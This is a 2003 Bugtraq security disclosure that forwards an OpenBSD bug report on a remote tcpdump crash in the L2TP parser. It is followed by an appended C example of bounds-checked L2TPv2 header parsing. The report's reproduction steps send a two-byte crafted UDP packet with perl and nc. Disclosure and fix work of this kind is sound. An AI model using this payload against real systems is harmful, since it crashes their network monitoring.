Message-ID: <3FE477F2.6050008@freebsd.lublin.pl>
Date: Sat, 20 Dec 2003 17:25:22 +0100
From: Przemyslaw Frasunek <venglin@...ebsd.lublin.pl>
To: bugtraq@...urityfocus.com
Subject: Remote crash in tcpdump from OpenBSD


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



- -------- Original Message --------
Subject: user/3610: repeatable tcpdump remote crash
Resent-Date: Sat, 20 Dec 2003 08:55:02 -0700 (MST)
Resent-From: gnats@....openbsd.org (GNATS Filer)
Resent-To: bugs@....openbsd.org
Date: Sat, 20 Dec 2003 16:42:25 +0100 (CET)
From: venglin@...ebsd.lublin.pl
Reply-To: venglin@...ebsd.lublin.pl
To: gnats@...nbsd.org

>Number:         3610
>Category:       user
>Synopsis:       repeatable tcpdump remote crash
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Sat Dec 20 15:50:02 GMT 2003
>Closed-Date:
>Last-Modified:
>Originator:     Przemyslaw Frasunek
>Release:        3.3-RELEASE
>Organization:
net
>Environment:
	System      : OpenBSD 3.3
	Architecture: OpenBSD.i386
	Machine     : i386
>Description:
	Sending a packet containing 0xff,0x02 bytes to port 1701/udp causes
	an L2TP protocol parser in tcpdump to enter an infinite loop, eating
	all available memory and then segfaulting.

	This bug also affects tcpdump in -CURRENT.
>How-To-Repeat:
	tcpdump -i lo0 -n udp and dst port 1701 &
	perl -e 'print "\xff\x02"' | nc -u localhost 1701
>Fix:
	Unknown, recent versions of tcpdump are immune to this problem.


>Release-Note:
>Audit-Trail:
>Unformatted:


- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@...ber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQE/5HfykxEnBiV4/K0RApAkAKDMw3qheVAkGu3v2EvoCoq07C8ZYgCgh9sl
ZjwiNzK9di8oSMQ1XK/YF+g=
=Q0AT
-----END PGP SIGNATURE-----
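
The report gives no root cause. As an added example (not tcpdump's code and not part of the original post), the following is a bounds-checked parse of the L2TPv2 header as laid out in RFC 2661: every field is read only if it lies inside the captured bytes, so the two-byte payload from the report is rejected as truncated. The function and array names are hypothetical, and the valid sample packet is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Flag bits in the first 16-bit word of an L2TPv2 header (RFC 2661, 3.1). */
#define L2TP_L   0x4000u  /* Length field present */
#define L2TP_S   0x0800u  /* Ns and Nr present */
#define L2TP_O   0x0200u  /* Offset Size present */
#define L2TP_VER 0x000fu  /* version nibble, must be 2 */

/* report_payload: bytes from the report. valid_ctrl: constructed sample. */
const uint8_t report_payload[] = { 0xff, 0x02 };
const uint8_t valid_ctrl[] = { 0xc8, 0x02, 0x00, 0x0c, 0x00, 0x01,
                               0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

/* Read a big-endian u16 only if it lies inside the captured bytes. */
static int get16(const uint8_t *p, size_t caplen, size_t *off, uint16_t *out)
{
    if (*off > caplen || caplen - *off < 2)
        return -1;
    *out = (uint16_t)((p[*off] << 8) | p[*off + 1]);
    *off += 2;
    return 0;
}

/* Returns the header length in bytes, or -1 if truncated or malformed. */
int l2tp_header_len(const uint8_t *p, size_t caplen)
{
    size_t off = 0;
    uint16_t flags, len = 0, v;

    if (get16(p, caplen, &off, &flags) < 0) return -1;
    if ((flags & L2TP_VER) != 2) return -1;
    if ((flags & L2TP_L) && get16(p, caplen, &off, &len) < 0) return -1;
    if (get16(p, caplen, &off, &v) < 0) return -1;      /* Tunnel ID */
    if (get16(p, caplen, &off, &v) < 0) return -1;      /* Session ID */
    if ((flags & L2TP_S) && (get16(p, caplen, &off, &v) < 0 ||   /* Ns */
                             get16(p, caplen, &off, &v) < 0))    /* Nr */
        return -1;
    if (flags & L2TP_O) {
        if (get16(p, caplen, &off, &v) < 0) return -1;  /* Offset Size */
        if (v > caplen - off) return -1;                /* pad must fit */
        off += v;
    }
    /* A declared Length must cover the header and fit the capture. */
    if ((flags & L2TP_L) && (len < off || len > caplen)) return -1;
    return (int)off;
}

int main(void) { printf("%d\n", l2tp_header_len(report_payload, 2)); return 0; }
```
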


